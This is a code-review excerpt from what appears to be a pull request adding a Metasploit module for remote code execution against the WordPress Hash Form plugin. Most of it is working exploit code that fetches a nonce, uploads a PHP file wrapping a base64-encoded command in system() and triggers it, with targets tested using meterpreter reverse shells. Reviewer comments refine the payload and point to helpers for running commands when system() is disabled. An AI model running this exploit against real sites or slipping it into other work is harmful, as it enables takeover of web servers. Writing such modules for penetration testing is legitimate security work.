modules/exploits/multi/http/wp_hash_form_rce.rb

```diff
@@ -0,0 +1,154 @@
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2024-05-23',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+      )
+  end
+
+  def check
+    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?
+
+    plugin_check_code = check_plugin_version_from_readme('hash-form', '1.1.1')
+    return CheckCode::Unknown('Hash Form plugin does not appear to be installed.') unless plugin_check_code
+    return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == 'detected'
+
+    plugin_version = plugin_check_code.details[:version]
+    return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == 'appears'
+
+    print_good("Detected Hash Form plugin version: #{plugin_version}")
+    CheckCode::Appears
+  end
+
+  def exploit
+    print_status('Attempting to retrieve nonce from the target...')
+    nonce = get_nonce
+
+    fail_with(Failure::NoTarget, 'Failed to retrieve the nonce necessary for file upload. The target may not be vulnerable or the Hash Form plugin might not be active.') unless nonce
+
+    print_good("Nonce retrieved: #{nonce}")
+    print_status('Uploading PHP payload using the retrieved nonce...')
+
+    file_url = upload_php_file(nonce)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the PHP payload. Check file permissions and server settings.') unless file_url
+
+    print_good("PHP payload uploaded successfully to #{file_url}")
+    trigger_payload(file_url)
+  end
+
+  def get_nonce
+    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri,
+      'vars_get' => {
+        'action' => 'hashform_preview',
+        'form' => 1
+      }
+    })
+
+    return nil unless res && res.code == 200
+
+    script_content = res.body.match(%r{<script id="frontend-js-extra"[^>]*>([\s\S]*?)</script>})
+    return nil unless script_content && script_content[1]
+
+    nonce_match = script_content[1].match(/"ajax_nounce":"([a-f0-9]+)"/)
+    nonce_match ? nonce_match[1] : nil
+  end
+
+  def upload_php_file(nonce)
+    file_content = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
```

Comment:
Not a blocker, but `payload.encoded` already includes the `<?php` tag. This also works:
```suggestion
    file_content = target['Arch'] == ARCH_PHP ? payload.encoded : "<?php system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>"
```

Reply:
Also, `system` PHP function can be explicitly disabled on the server. Metasploit provides some useful helpers to get around this in the `Msf::Payload::Php` [mixin](https://github.com/rapid7/metasploit-framework/blob/ebfbd3d3052e1c6ec21319c8bbfecfaaef576fa6/lib/msf/core/payload/php.rb). Here is an example that uses these helpers: https://github.com/rapid7/metasploit-framework/blob/ebfbd3d3052e1c6ec21319c8bbfecfaaef576fa6/modules/payloads/singles/php/exec.rb#L30-L41